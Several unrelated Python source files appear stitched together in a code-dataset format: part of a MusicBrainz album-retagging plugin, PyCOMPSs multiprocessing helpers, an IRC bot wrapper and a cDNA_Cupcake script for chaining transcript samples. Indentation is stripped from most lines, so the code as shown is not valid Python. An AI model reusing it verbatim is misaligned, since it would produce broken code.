self.result_label.set_text("Error encountered. Please retry.")
self.search_button.set_sensitive(True)
return
for release in map(lambda r: r.release, results):
self._resultlist.append((release, ))
if len(results) > 0 and self.result_combo.get_active() == -1:
self.result_label.set_markup("<i>Loading result...</i>")
self.result_combo.set_active(0)
else:
self.result_label.set_markup("No results found.")
def __result_changed(self, combo):
"""Called when a release is chosen from the result combo."""
idx = combo.get_active()
if idx == -1:
return
rel_id = self._resultlist[idx][0].id
if rel_id in self._releasecache:
            self.__update_result(self._releasecache[rel_id])
else:
self.result_label.set_markup("<i>Loading result...</i>")
inc = ws.ReleaseIncludes(
artist=True, releaseEvents=True, tracks=True)
self._qthread.add(self.__update_result,
self._query.getReleaseById, rel_id, inc)
def __update_result(self, release):
"""Callback for release detail download from result combo."""
num_results = len(self._resultlist)
text = ngettext("Found %d result.", "Found %d results.", num_results)
self.result_label.set_text(text % num_results)
# issue 973: search can return invalid (or removed) ReleaseIDs
if release is None:
return
self._releasecache.setdefault(extractUuid(release.id), release)
self.result_treeview.update_remote_album(release.tracks)
self.current_release = release
self.release_combo.update(release)
save_button = dialog_get_widget_for_stockid(self, Gtk.STOCK_SAVE)
save_button.set_sensitive(True)
def __init__(self, parent, album, cache):
self.album = album
self._query = ws.Query()
self._resultlist = Gtk.ListStore(GObject.TYPE_PYOBJECT)
self._releasecache = cache
self._qthread = QueryThread()
self.current_release = None
super(SearchWindow, self).__init__("MusicBrainz lookup", buttons=(
Gtk.STOCK_CANCEL, Gtk.ResponseType.REJECT,
Gtk.STOCK_SAVE, Gtk.ResponseType.ACCEPT))
self.set_default_size(650, 500)
self.set_border_width(5)
self.set_transient_for(parent)
save_button = dialog_get_widget_for_stockid(self, Gtk.STOCK_SAVE)
save_button.set_sensitive(False)
vb = Gtk.VBox()
vb.set_spacing(8)
hb = Gtk.HBox()
hb.set_spacing(8)
sq = self.search_query = Gtk.Entry()
sq.connect('activate', self.__do_query)
alb = '"%s"' % album[0].comma("album").replace('"', '')
art = get_artist(album)
if art:
alb = '%s AND artist:"%s"' % (alb, art.replace('"', ''))
sq.set_text('%s AND tracks:%d' %
(alb, get_trackcount(album)))
lbl = Gtk.Label(label="_Query:")
lbl.set_use_underline(True)
lbl.set_mnemonic_widget(sq)
stb = self.search_button = Gtk.Button('S_earch', use_underline=True)
stb.connect('clicked', self.__do_query)
hb.pack_start(lbl, False, True, 0)
hb.pack_start(sq, True, True, 0)
hb.pack_start(stb, False, True, 0)
vb.pack_start(hb, False, True, 0)
self.result_combo = ResultComboBox(self._resultlist)
self.result_combo.connect('changed', self.__result_changed)
vb.pack_start(self.result_combo, False, True, 0)
rhb = Gtk.HBox()
rl = Gtk.Label()
rl.set_markup("Results <i>(drag to reorder)</i>")
rl.set_alignment(0, 0.5)
rhb.pack_start(rl, False, True, 0)
rl = self.result_label = Gtk.Label(label="")
rhb.pack_end(rl, False, True, 0)
vb.pack_start(rhb, False, True, 0)
sw = Gtk.ScrolledWindow()
sw.set_shadow_type(Gtk.ShadowType.IN)
sw.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.ALWAYS)
rtv = self.result_treeview = ResultTreeView(self.album)
rtv.set_border_width(8)
sw.add(rtv)
vb.pack_start(sw, True, True, 0)
hb = Gtk.HBox()
hb.set_spacing(8)
self.release_combo = ReleaseEventComboBox()
vb.pack_start(self.release_combo, False, True, 0)
self.get_content_area().pack_start(vb, True, True, 0)
self.connect('response', self.__save)
stb.emit('clicked')
self.get_child().show_all()
class MyBrainz(SongsMenuPlugin):
PLUGIN_ID = "MusicBrainz lookup"
PLUGIN_NAME = "MusicBrainz Lookup"
PLUGIN_ICON = Gtk.STOCK_CDROM
PLUGIN_DESC = 'Retag an album based on a MusicBrainz search.'
PLUGIN_VERSION = '0.5'
cache = {}
def plugin_albums(self, albums):
if not albums:
return
def win_finished_cb(widget, *args):
if albums:
start_processing(albums.pop(0))
else:
self.plugin_finish()
def start_processing(disc):
win = SearchWindow(
self.plugin_window, disc, self.cache)
win.connect("destroy", win_finished_cb)
win.show()
start_processing(albums.pop(0))
@classmethod
def PluginPreferences(self, win):
items = [
('split_disc', 'Split _disc from album', True),
('split_feat', 'Split _featured performers from track', False),
('year_only', 'Only use year for "date" tag', False),
('albumartist', 'Write "_albumartist" when needed', True),
('artist_sort', 'Write sort tags for artist names', False),
('standard', 'Write _standard MusicBrainz tags', True),
('labelid', 'Write _labelid tag (fixes multi-disc albums)', True),
]
vb = Gtk.VBox()
vb.set_spacing(8)
for key, label, default in items:
ccb = ConfigCheckButton(label, 'plugins', 'brainz_' + key)
ccb.set_active(config_get(key, default))
vb.pack_start(ccb, True, True, 0)
return vb
|
manager.py
|
#!/usr/bin/python
#
# Copyright 2002-2021 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Util - process/manager
============================================
This file centralizes the multiprocessing management. It helps to
homogenize the behaviour between Linux and macOS.
"""
from pycompss.util.typing_helper import typing
import multiprocessing
from multiprocessing import Queue # Used only for typing
from multiprocessing import Process # Used only for typing
try:
from multiprocessing import Manager
from multiprocessing.shared_memory import SharedMemory # noqa
from multiprocessing.shared_memory import ShareableList # noqa
from multiprocessing.managers import SharedMemoryManager # noqa
except ImportError:
# Unsupported in python < 3.8
Manager = None # type: ignore
SharedMemory = None # type: ignore
ShareableList = None # type: ignore
SharedMemoryManager = None # type: ignore
def initialize_multiprocessing() -> None:
"""Set global mechanism to start multiprocessing processes.
https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods # noqa: E501
Using fork even in MacOS.
WARNING: This method must be called only once and at the very beginning.
:return: None
"""
try:
multiprocessing.set_start_method("fork")
except AttributeError:
# Unsupported set_start_method (python 2 mainly).
# Use default start method.
pass
except RuntimeError:
# Already initialized
pass
def new_process() -> Process:
"""Instantiate a new empty process.
:return: Empty process
"""
return multiprocessing.Process()
def new_queue() -> Queue:
"""Instantiate a new queue.
:return: New queue
"""
return multiprocessing.Queue()
def new_manager() -> typing.Any:
"""Instantiate a new empty multiprocessing manager.
:return: Empty multiprocessing manager
"""
return Manager()
def create_process(target: typing.Any, args: tuple = ()) -> Process:
"""Create a new process instance for the given target with the provided
arguments.
:param target: Target function to execute in a multiprocessing process
:param args: Target function arguments
:return: New process
"""
process = multiprocessing.Process(target=target, args=args)
return process
def create_shared_memory_manager(
address: typing.Tuple[str, int], authkey: typing.Optional[bytes]
) -> SharedMemoryManager:
"""Create a new shared memory manager process at the given address with
the provided authkey.
:param address: Shared memory manager address (IP, PORT)
:param authkey: Shared memory manager authentication key
    :return: New shared memory manager
"""
smm = SharedMemoryManager(address=address, authkey=authkey)
return smm
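# Minimal usage sketch (illustrative, not part of PyCOMPSs): shows how the helpers in
# this module are meant to be combined. The worker function and the queue payload are
# assumptions made purely for the example.
def _example_worker(queue) -> None:
    queue.put("done")
def _example_usage() -> None:
    initialize_multiprocessing()  # must be called once, at the very beginning
    queue = new_queue()
    process = create_process(target=_example_worker, args=(queue,))
    process.start()
    process.join()
    print(queue.get())  # -> "done"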
|
ircwrapper.py
|
"""
Handle the IRC connection for the bot
"""
try:
from queue import Queue
except ImportError:
from Queue import Queue
from threading import Thread
from irc.bot import SingleServerIRCBot
from time import sleep, time
class Task(object):
"""
Container for a IRCWrapper task that can be passed through the Queue
between threads
"""
def __init__(self, method, *args, **kwargs):
self.method = method
self.args = args
self.kwargs = kwargs
def __str__(self):
return "<Task:(method={0},{1} args,{2} kwargs>".format(
self.method,
len(self.args),
len(self.kwargs)
)
class IRCWrapper(SingleServerIRCBot):
"""
Convenient wrapper for the irc class methods, rate limits the messages
sent to the server to avoid being banned for spamming.
"""
def __init__(self, logger=None, bot=None, settings=None, channelList=None,
nickname=None,
server=None, password=None,
port=6667, commandPrefix='!'):
self.bot = bot
self.logger = logger
self.channelList = channelList
self.commandPrefix = commandPrefix
self.queue = Queue()
self.irc_thread = None
self.call_thread = None
self.out_thread = None
self.call_relay = None
if bot:
self.queue_delay = settings.QUEUE_DELAY
else:
self.queue_delay = 1
serverList = []
if server:
if password:
self.logger.info(
"Connecting to {0}:{1} using a password".format(
server, port
))
serverList.append((server, port, password))
else:
self.logger.info(
"Connecting to {0}:{1} with no password".format(
server, port
))
serverList.append((server, port))
super(IRCWrapper, self).__init__(
server_list=serverList,
nickname=nickname,
realname=nickname,
reconnection_interval=15,
)
# Public API
def set_call_relay(self, call_relay):
self.call_relay = call_relay
def call_relay_loop():
if self.call_relay:
self.call_relay.loop()
self.call_thread = Thread(target=call_relay_loop)
self.call_thread.daemon = True
self.call_thread.start()
def start(self):
"""
Start the IRC connection and thread
:return: None
"""
self._start_threads()
def stop(self):
"""
Stop our threads etc.
:return: None
"""
self.queue.put(None)
self.call_relay.stop()
def message(self, channel, message):
"""
Request to send a message to the channel, request is placed in output
buffering task queue.
:param channel: The channel to send the message to
:param message: The message to be sent
:return: None
"""
lines = message.split("\n")
if len(lines) > 3:
lines = lines[-3:]
for line in lines:
self.queue.put(Task(
"_send_message",
channel,
line
))
def is_oper(self, channel, nick):
"""
Check if the user is an operator/moderator in the channel
:param channel: Which channel
:param nick: What is the user's nick
:return:
"""
return self.channels[channel].is_oper(nick)
def get_users(self, channel):
"""
Get the users currently in the given channel
:param channel: Which channel
:return:
"""
users = []
if channel in self.channels:
users = self.channels[channel].users()
return users
def _start_threads(self):
"""
Start a thread that will work on the tasks while preventing us from
getting banned on Twitch servers etc.
:return: None
"""
def worker():
while True:
task = self.queue.get()
                if task is None:
return
self._process_task(task)
sleep(self.queue_delay)
self.out_thread = Thread(target=worker)
self.out_thread.daemon = True
self.out_thread.start()
def irc():
super(IRCWrapper, self).start()
self.irc_thread = Thread(target=irc)
self.irc_thread.daemon = True
self.irc_thread.start()
def _process_task(self, task):
"""
Process a single Task
:param task: An instance of the Task class
:return: None
"""
method = getattr(self, task.method)
if not method:
raise ValueError("No method {0} in IRC wrapper?".format(
task.method
))
method(*task.args, **task.kwargs)
def _send_message(self, channel, message):
"""
Actually send a message on a channel
:param channel: The channel to send the message to
:param message: The message to be sent
:return: None
"""
self.connection.privmsg(channel, message)
def on_disconnect(self, connection, event):
"""
Event handler run when the bot is disconnected from the server
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
self.logger.warn("Got disconnected from server: {0}".format(
repr(event)
))
msg = "Disconnected from server, reconnecting. " \
"Are your login details correct?"
for channel in self.channelList:
self.bot.console(channel, msg)
def on_welcome(self, connection, event):
"""
Event handler run after connection to server has been established,
joins the channels the bot should be on.
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
self.logger.info("Connected to server, joining channels...")
msg = "Connected to IRC server! Joining {0}."
for channel in self.channelList:
self.bot.console(channel, msg.format(channel))
self.logger.info("Joining channel {0}".format(channel))
connection.join(channel.lower())
def on_join(self, connection, event):
"""
Event handler run when the bot joins a channel, and in case of
Twitch for some other unknown reason(s) as well.
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
channel = self._get_event_channel(event)
self.logger.info("Joined {0}".format(channel))
def on_pubmsg(self, connection, event, timestamp=None):
"""
        Event handler run when the bot sees a new message on any channel
:param connection: The irc connection object
:param event: An event containing more relevant info
:return: None
"""
text = self._get_event_text(event)
channel = self._get_event_channel(event)
nick = self._get_event_nick(event)
if timestamp is None:
timestamp = time()
cmd = False
command, args = self._get_command(text)
if command:
cmd = self.bot.irc_command(channel, nick, command, args, timestamp)
if not cmd:
self.bot.chat_message(channel, nick, text, timestamp)
def _get_event_channel(self, event):
"""
Extract the channel name from the given event
:param event: An event object
        :return: The channel name the event occurred on
"""
return event.target
def _get_event_text(self, event):
"""
Extract the message text from a message event
:param event: A message event
:return: The message text
"""
return event.arguments[0]
def _get_event_nick(self, event):
"""
Get the nick for the user that triggered this message event
:param event: A message event
:return: The user's nick
"""
return event.source.nick
def _get_command(self, text):
"""
Extract any command on the given chat line
>>> from bot.ircwrapper import IRCWrapper
>>> i = IRCWrapper()
>>> i._get_command("!def")
('def', [])
>>> i._get_command("!foo bar")
('foo', ['bar'])
>>> i._get_command("abc 123")
(None, 'abc 123')
:param text: A line of text from the chat
        :return: Command name and list of arguments, or (None, original text)
                 if no command was found
"""
if not text.startswith(self.commandPrefix):
return None, text
# Strip off the command prefix
text = text[len(self.commandPrefix):].strip()
# Take the first word, in lowercase
parts = text.split(' ')
command = parts[0].lower()
args = parts[1:]
return command, args
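# Illustrative sketch (not part of the wrapper): how message() feeds the rate-limited
# output queue. The channel name and text are made up; since no server is configured
# here, the Task simply waits in the queue until start() launches the worker thread.
def _example_queue_message():
    wrapper = IRCWrapper(channelList=["#example"], nickname="examplebot")
    wrapper.message("#example", "hello")  # enqueues a "_send_message" Task
    return wrapper.queue.qsize()  # -> 1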
|
chain_samples.py
|
#!/usr/bin/env python
__author__ = 'etseng@pacb.com'
import os, sys, glob, shutil
import pdb
from multiprocessing import Process
from csv import DictReader, DictWriter
from collections import defaultdict, OrderedDict
from Bio import SeqIO
from bx.intervals.cluster import ClusterTree
from cupcake.io import GFF
from cupcake.tofu.counting import combine_abundance_across_samples as sp
def sample_sanity_check(group_filename, gff_filename, count_filename, fastq_filename=None):
"""
Double check that the formats are expected and all PBIDs are concordant across the files
:return: raise Exception if sanity check failed
"""
print("Sanity checking. Retrieving PBIDs from {0},{1},{2}...".format(\
group_filename, gff_filename, count_filename), file=sys.stderr)
ids1 = [line.strip().split()[0] for line in open(group_filename)]
ids2 = [r.seqid for r in GFF.collapseGFFReader(gff_filename)]
f = open(count_filename)
while True:
# advance through the headers which start with #
cur = f.tell()
if not f.readline().startswith('#') or f.tell() == cur: # first non-# seen or EOF
f.seek(cur)
break
ids3 = [r['pbid'] for r in DictReader(f, delimiter='\t')]
if len(set(ids2).difference(ids1))>0 or len(set(ids2).difference(ids3))>0:
raise Exception("Sanity check failed! Please make sure the PBIDs listed in {1} are also in {0} and {2}".format(\
group_filename, gff_filename, count_filename))
if fastq_filename is not None:
ids4 = [r.id.split('|')[0] for r in SeqIO.parse(open(fastq_filename), 'fastq')]
if len(set(ids2).difference(ids4))>0:
raise Exception("Sanity check failed! Please make sure the PBIDs listed in {1} are also in {0}".format(\
fastq_filename, gff_filename))
def read_config(filename):
"""
tmpSAMPLE=<name>;<path>
SAMPLE=<name>;<path>
must also have
GROUP_FILENAME=
GFF_FILENAME=
COUNT_FILENAME=
optional:
FASTQ_FILENAME=
"""
sample_dirs = {}
sample_names = []
group_filename, gff_filename, count_filename = None, None, None
fastq_filename = None
no_more_tmp = False
with open(filename) as f:
for line in f:
if line.startswith('tmpSAMPLE='):
if no_more_tmp:
print("Cannot have tmp_ samples after non-tmp_ samples! Abort!", file=sys.stderr)
sys.exit(-1)
name, path = line.strip()[len('tmpSAMPLE='):].split(';')
if name.startswith('tmp_'):
print("Sample names are not allowed to start with tmp_! Please change {0} to something else.".format(name), file=sys.stderr)
sys.exit(-1)
sample_dirs[name] = os.path.abspath(path)
sample_names.append('tmp_'+name)
elif line.startswith('SAMPLE='):
no_more_tmp = True
name, path = line.strip()[len('SAMPLE='):].split(';')
if name.startswith('tmp_'):
print("Sample names are not allowed to start with tmp_! Please change {0} to something else.".format(name), file=sys.stderr)
sys.exit(-1)
sample_dirs[name] = os.path.abspath(path)
sample_names.append(name)
elif line.startswith('GROUP_FILENAME='):
group_filename = line.strip()[len('GROUP_FILENAME='):]
elif line.startswith('GFF_FILENAME='):
gff_filename = line.strip()[len('GFF_FILENAME='):]
elif line.startswith('COUNT_FILENAME='):
count_filename = line.strip()[len('COUNT_FILENAME='):]
elif line.startswith('FASTQ_FILENAME='):
fastq_filename = line.strip()[len('FASTQ_FILENAME='):]
if group_filename is None:
raise Exception("Expected GROUP_FILENAME= but not in config file {0}! Abort.".format(filename))
if count_filename is None:
raise Exception("Expected COUNT_FILENAME= but not in config file {0}! Abort.".format(filename))
if gff_filename is None:
raise Exception("Expected GFF_FILENAME= but not in config file {0}! Abort.".format(filename))
if len(sample_names) == 0:
print("No samples given. Exit.", file=sys.stderr)
sys.exit(-1)
return sample_dirs, sample_names, group_filename, gff_filename, count_filename, fastq_filename
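# Illustrative example of a chaining config file accepted by read_config(); the sample
# names and paths are made up, while the keys follow the docstring above:
#
#   SAMPLE=heart;/path/to/heart_collapsed
#   SAMPLE=liver;/path/to/liver_collapsed
#   GROUP_FILENAME=touse.group.txt
#   GFF_FILENAME=touse.gff
#   COUNT_FILENAME=touse.abundance.txt
#   FASTQ_FILENAME=touse.rep.fq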
def read_count_info(count_filename, dirs, field_to_use):
count_info = {} # key: (sample, PB.1.1) --> count
count_header = ''
for name, d in dirs.items():
f = open(os.path.join(d, count_filename))
while True:
cur = f.tell()
line = f.readline().strip()
if not line.startswith('#'): break
count_header += line
f.seek(cur)
for r in DictReader(f, delimiter='\t'):
count_info[name, r['pbid']] = r[field_to_use]
return count_header, count_info
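# Illustrative layout of a count file as consumed by read_count_info() above; header
# lines start with '#' and the remaining rows are tab-separated with a 'pbid' column
# plus the count field selected via field_to_use (values here are made up):
#
#   # comment/header lines...
#   pbid<TAB>count_fl<TAB>norm_fl
#   PB.1.1<TAB>12<TAB>1.2e-04
#   PB.2.1<TAB>3<TAB>3.0e-05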
def chain_split_file(ref_gff, ref_group, ref_name, addon_gff, addon_group, addon_name, fuzzy_junction, allow_5merge, max_3_diff, n_chunks):
addon_group_info = sp.MegaPBTree.read_group(addon_group, None)
recs = []
tree = OrderedDict()
i = 0
for r in GFF.collapseGFFReader(addon_gff):
if r.chr not in tree:
tree[r.chr] = {'+':ClusterTree(0,0), '-':ClusterTree(0,0)}
tree[r.chr][r.strand].insert(r.start, r.end, i)
recs.append(r)
i += 1
n = len(recs)
chunk_size = (n//n_chunks) + (n%n_chunks>0)
split_files = []
i = 0
counter = 0
f_gff = open(addon_gff + '.split' + str(i), 'w')
f_group = open(addon_group + '.split' + str(i), 'w')
for v1 in tree.values():
for strand in ('+','-'):
v2 = v1[strand]
for _start, _end, _indices in v2.getregions():
for cur in _indices:
GFF.write_collapseGFF_format(f_gff, recs[cur])
f_group.write("{0}\t{1}\n".format(recs[cur].seqid, ",".join(addon_group_info[recs[cur].seqid])))
counter += 1
if counter >= (i+1)*chunk_size:
i += 1
f_gff.close()
f_group.close()
split_files.append((f_gff.name, f_group.name))
f_gff = open(addon_gff+'.split'+str(i), 'w')
f_group = open(addon_group + '.split' + str(i), 'w')
if not f_gff.closed:
f_gff.close()
f_group.close()
split_files.append((f_gff.name, f_group.name))
result_prefixes = []
pools = []
for i,(split_gff,split_group) in enumerate(split_files):
p = Process(target=chain_helper, args=(ref_gff, ref_group, split_gff, split_group, ref_name, addon_name+'.'+str(i), fuzzy_junction, allow_5merge, max_3_diff))
p.start()
pools.append(p)
result_prefixes.append((ref_name, addon_name+'.'+str(i)))
for p in pools:
p.join()
return result_prefixes, split_files
def chain_helper(ref_gff, ref_group, addon_gff, addon_group, name1, name2, fuzzy_junction, allow_5merge, max_3_diff):
o = sp.MegaPBTree(ref_gff, ref_group, self_prefix=name1, \
internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename=None)
o.add_sample(addon_gff, addon_group, \
sample_prefix=name2, output_prefix='tmp_' + name2, \
fastq_filename=None)
def combine_split_chained_results(output_prefixes, final_prefix, ref_gff, ref_group, ref_name, ref_fq, addon_gff, addon_group, addon_name, addon_fq):
"""
Each <output_prefix> will have .gff, .group.txt, .mega_info.txt.
There should be NO overlap between the split files, so clean merge should be possible!
1. read the .gff files, record the group and mega (id-map) info
2. sort the total records so can properly put on a unified superPBID
3. write out the unified result
4. delete the split files
"""
# sanity check files are all there
split_files = [] # tuple of (gff, group, mega)
for ref_name,o in output_prefixes:
gff_file = 'tmp_' + o + '.gff'
mega_file = 'tmp_' + o + '.mega_info.txt'
group_file = 'tmp_' + o + '.group.txt'
if not os.path.exists(gff_file) or not os.path.exists(mega_file) or not os.path.exists(group_file):
print("Expects to see {0},{1},{2} but one or more files are missing! Abort!".format(gff_file, mega_file, group_file), file=sys.stderr)
sys.exit(-1)
split_files.append((ref_name, o, gff_file, group_file, mega_file))
use_fq = False
if ref_fq is not None and addon_fq is not None:
use_fq = True
ref_fq_dict = dict((r.id.split('|')[0], r) for r in SeqIO.parse(open(ref_fq),'fastq'))
addon_fq_dict = dict((r.id.split('|')[0], r) for r in SeqIO.parse(open(addon_fq), 'fastq'))
mega_info = {} # ref id -> list of matching query_id, or empty list
split_unmatched = set()
for (ref_name, split_name, gff_file, group_file, mega_file) in split_files:
for r in DictReader(open(mega_file), delimiter='\t'):
if r[ref_name]!='NA':
if r[ref_name] not in mega_info:
mega_info[r[ref_name]] = []
if r[split_name]!='NA':
mega_info[r[ref_name]].append(r[split_name])
else: # ref is NA, non-ref is not NA
split_unmatched.add(r[split_name])
# make a rec list of matches of (ref_id, addon_id, representative record, combined group info) where rec_ref or ref_addon could be None, but not both
rec_list = []
d_ref = dict((r.seqid, r) for r in GFF.collapseGFFReader(ref_gff))
d_addon = dict((r.seqid, r) for r in GFF.collapseGFFReader(addon_gff))
ref_group_info = sp.MegaPBTree.read_group(ref_group, None)
addon_group_info = sp.MegaPBTree.read_group(addon_group, None)
for ref_id, matches in mega_info.items():
if len(matches) == 0: rec_list.append(sp.MatchRecord(ref_id=ref_id, addon_id='NA', rec=d_ref[ref_id],
members=ref_group_info[ref_id],
seqrec=ref_fq_dict[ref_id] if use_fq else None))
else:
for addon_id in matches:
r1 = d_ref[ref_id]
r2 = d_addon[addon_id]
if (r1.end - r1.start) > (r2.end - r2.start):
rec_list.append(sp.MatchRecord(ref_id=ref_id, addon_id=addon_id, rec=r1,
members=ref_group_info[ref_id]+addon_group_info[addon_id],
seqrec=ref_fq_dict[ref_id] if use_fq else None))
else:
rec_list.append(sp.MatchRecord(ref_id=ref_id, addon_id=addon_id, rec=r2,
members=ref_group_info[ref_id]+addon_group_info[addon_id],
seqrec=addon_fq_dict[addon_id] if use_fq else None))
for addon_id in split_unmatched:
rec_list.append(sp.MatchRecord(ref_id='NA', addon_id=addon_id, rec=d_addon[addon_id],
members=addon_group_info[addon_id],
seqrec=addon_fq_dict[addon_id] if use_fq else None))
sp.write_reclist_to_gff_n_info(rec_list, final_prefix, ref_name, addon_name, use_fq)
for (ref_name, split_name, gff_file, group_file, mega_file) in split_files:
os.remove(gff_file)
os.remove(group_file)
os.remove(mega_file)
def chain_samples(dirs, names, group_filename, gff_filename, count_filename, field_to_use='count_fl', fuzzy_junction=0, allow_5merge=False, max_3_diff=100, fastq_filename=None):
for d in dirs.values():
sample_sanity_check(os.path.join(d, group_filename),\
os.path.join(d, gff_filename),\
os.path.join(d, count_filename),\
os.path.join(d, fastq_filename) if fastq_filename is not None else None)
count_header, count_info = read_count_info(count_filename, dirs, field_to_use)
# some names may already start with "tmp_" which means they are intermediate results that have already been chained
# find the first non "tmp_" and start from there
if names[0].startswith('tmp_'):
chain = []
for start_i,name in enumerate(names):
if name.startswith('tmp_'):
chain.append(name[4:])
else:
break
# start_i, name now points at the first "non-tmp" sample
# we want to go to the last tmp_ sample and read it
name = names[start_i-1][4:] # this is the last tmp_ sample, let's read it
o = sp.MegaPBTree('tmp_'+name+'.gff', 'tmp_'+name+'.group.txt', self_prefix='tmp_'+name, \
internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename='tmp_'+name+'.rep.fq' if fastq_filename is not None else None)
#chain.append(name) # no need, already done above
else: # everything is new, start fresh
name = names[0]
d = dirs[name]
chain = [name]
o = sp.MegaPBTree(os.path.join(d, gff_filename), os.path.join(d, group_filename), \
self_prefix=name, internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename=os.path.join(d, fastq_filename) if fastq_filename is not None else None)
start_i = 1
for name in names[start_i:]:
assert not name.startswith('tmp_')
d = dirs[name]
o.add_sample(os.path.join(d, gff_filename), os.path.join(d, group_filename), \
sample_prefix=name, output_prefix='tmp_'+name, \
fastq_filename=os.path.join(d, fastq_filename) if fastq_filename is not None else None)
o = sp.MegaPBTree('tmp_'+name+'.gff', 'tmp_'+name+'.group.txt', self_prefix='tmp_'+name, \
internal_fuzzy_max_dist=fuzzy_junction, \
allow_5merge=allow_5merge, \
max_3_diff=max_3_diff, \
fastq_filename='tmp_'+name+'.rep.fq' if fastq_filename is not None else None)
chain.append(name)
# now recursively chain back by looking at mega_info.txt!!!
d = {} # ex: (tmp_1009, PB.1.1) --> mega info dict
for c in chain[1:]:
for r in DictReader(open('tmp_' + c + '.mega_info.txt'),delimiter='\t'):
d['tmp_'+c, r['superPBID']] = r
f1 = open('all_samples.chained_ids.txt', 'w')
writer1 = DictWriter(f1, fieldnames=['superPBID']+chain, delimiter='\t')
writer1.writeheader()
f2 = open('all_samples.chained_count.txt', 'w')
writer2 = DictWriter(f2, fieldnames=['superPBID']+chain, delimiter='\t')
writer2.writeheader()
reader = DictReader(open('tmp_' + chain[-1] + '.mega_info.txt'),delimiter='\t')
for r in reader:
saw_NA = False
r0 = r
answer = defaultdict(lambda: 'NA') # ex: 1009 --> PB.1.1
answer2 = defaultdict(lambda: 'NA') # ex: 1009 --> count
answer[chain[-1]] = r[chain[-1]]
if r[chain[-1]] !='NA':
answer2[chain[-1]] = count_info[chain[-1], answer[chain[-1]]]
for c in chain[::-1][1:-1]: # the first sample does not have tmp_, because it's not a chain
if r['tmp_'+c] == 'NA':
saw_NA = True
break
else:
r2 = d['tmp_'+c, r['tmp_'+c]]
answer[c] = r2[c]
if answer[c] != 'NA':
answer2[c] = count_info[c, answer[c]]
r = r2
if not saw_NA:
answer[chain[0]] = r[chain[0]]
if answer[chain[0]] !='NA':
answer2[chain[0]] = count_info[chain[0], answer[chain[0]]]
rec1 = {'superPBID': r0['superPBID']}
rec2 = {'superPBID': r0['superPBID']}
for c in chain:
rec1[c] = answer[c]
rec2[c] = str(answer2[c])
writer1.writerow(rec1)
writer2.writerow(rec2)
f1.close()
f2.close()
shutil.copyfile('tmp_' + chain[-1] + '.gff', 'all_samples.chained.gff')
if fastq_filename is not None:
shutil.copyfile('tmp_' + chain[-1] + '.rep.fq', 'all_samples.chained.rep.fq')
print("Chained output written to:", file=sys.stdout)
print("all_samples.chained.gff", file=sys.stdout)
print(f1.name, file=sys.stdout)
print(f2.name, file=sys.stdout)
if fastq_filename is not None:
print("all_samples.chained.rep.fq", file=sys.stdout)
def chain_samples_multithread(dirs, names, group_filename, gff_filename, count_filename, field_to_use='count_fl', fuzzy_junction=0, allow_5merge=False, max_3_diff=100, fastq_filename=None, cpus=4):
for d in dirs.values():
sample_sanity_check(os.path.join(d, group_filename),\
os.path.join(d, gff_filename),\
os.path.join(d, count_filename),\
os.path.join(d, fastq_filename) if fastq_filename is not None else None)
count_header, count_info = read_count_info(count_filename, dirs, field_to_use)
# some names may already start with "tmp_" which means they are intermediate results that have already been chained
# find the first non "tmp_" and start from there
if names[0].startswith('tmp_'):
chain = []
for start_i,name in enumerate(names):
if name.startswith('tmp_'):
chain.append(name[4:])
else:
break
# start_i, name now points at the first "non-tmp" sample
# we want to go to the last tmp_ sample and read it
name = names[start_i-1][4:] # this is the last tmp_ sample, let's read it
first_add = False
else: # everything is new, start fresh
name = names[0]
chain = [name]
start_i = 1
first_add = True
for addon_name in names[start_i:]:
assert not addon_name.startswith('tmp_')
ref_name = chain[-1]
ref_d = dirs[ref_name]
if first_add:
ref_gff = os.path.join(ref_d, gff_filename)
ref_group = os.path.join(ref_d, group_filename)
ref_fq = os.path.join(ref_d, fastq_filename) if fastq_filename is not None else None
else:
ref_name = 'tmp_' + ref_name
ref_gff = ref_name + '.gff'
ref_group = ref_name + '.group.txt'
ref_fq = ref_name + '.rep.fq' if fastq_filename is not None else None
addon_d = dirs[addon_name]
addon_gff = os.path.join(addon_d, gff_filename)
addon_group = os.path.join(addon_d, group_filename)
addon_fq = os.path.join(addon_d, fastq_filename) if fastq_filename is not None else None
split_outs, split_ins = chain_split_file(ref_gff=ref_gff,
ref_group=ref_group,
ref_name=ref_name,
addon_gff=addon_gff,
addon_group=addon_group,
addon_name=addon_name,
fuzzy_junction=fuzzy_junction,
allow_5merge=allow_5merge,
max_3_diff=max_3_diff,
n_chunks=cpus)
combine_split_chained_results(split_outs,
final_prefix='tmp_'+addon_name,
ref_gff=ref_gff,
ref_group=ref_group,
ref_name=ref_name,
ref_fq=ref_fq,
addon_gff=addon_gff,
addon_group=addon_group,
addon_name=addon_name,
addon_fq=addon_fq)
chain.append(addon_name)
for in_gff_split, in_group_split in split_ins:
os.remove(in_gff_split) # remove the split gff
os.remove(in_group_split)
first_add = False
# now recursively chain back by looking at mega_info.txt!!!
d = {} # ex: (tmp_sample1, PB.1.1) --> mega info dict
for c in chain[1:]:
for r in DictReader(open('tmp_' + c + '.mega_info.txt'),delimiter='\t'):
d['tmp_'+c, r['superPBID']] = r
f1 = open('all_samples.chained_ids.txt', 'w')
writer1 = DictWriter(f1, fieldnames=['superPBID']+chain, delimiter='\t')
writer1.writeheader()
f2 = open('all_samples.chained_count.txt', 'w')
writer2 = DictWriter(f2, fieldnames=['superPBID']+chain, delimiter='\t')
writer2.writeheader()
reader = DictReader(open('tmp_' + chain[-1] + '.mega_info.txt'),delimiter='\t')
